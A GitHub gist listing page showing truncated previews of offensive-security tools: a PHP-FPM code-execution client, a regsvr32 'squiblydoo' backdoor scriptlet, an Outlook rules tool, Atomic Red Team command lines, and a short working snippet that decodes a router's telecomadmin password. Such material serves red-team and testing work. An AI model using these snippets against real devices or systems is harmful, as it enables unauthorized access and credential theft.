H1d3r
🎯
H1d3r
/ fpm.py
Created
May 12, 2021 09:16
— forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import random | |
| import argparse | |
| import sys | |
| from io import BytesIO | |
| # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
| PY2 = True if sys.version_info.major == 2 else False |
H1d3r
/ telecomadmin-password_HG261GS.js
Created
January 28, 2021 01:20
— forked from Senorsen/telecomadmin-password_HG261GS.js
retrive telecomadmin password (HG261GS G60D1.00M4000)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // open http://192.168.1.1/cgi-bin/baseinfoSet.cgi | |
| console.log( | |
| json.BASEINFOSET.baseinfoSet_TELECOMPASSWORD | |
| .split('&') | |
| .filter(it => it) | |
| .map(it => String.fromCharCode(Number(it) > 57 ? Number(it) - 4 : Number(it))) | |
| .join('') | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
H1d3r
/ AtomicTestsCommandLines.txt
Created
August 31, 2018 12:09
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
| / \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
| / _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
| / ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
| /_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
| [********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
H1d3r
/ Backdoor-Minimalist.sct
Created
December 28, 2016 07:42
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
H1d3r
/ Rulz.py
Created
October 18, 2016 05:18
— forked from monoxgas/Rulz.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Rulz.py | |
| # Author: Nick Landers (@monoxgas) - Silent Break Security | |
| import os | |
| import sys | |
| import argparse | |
| import re | |
| import binascii | |
| import codecs |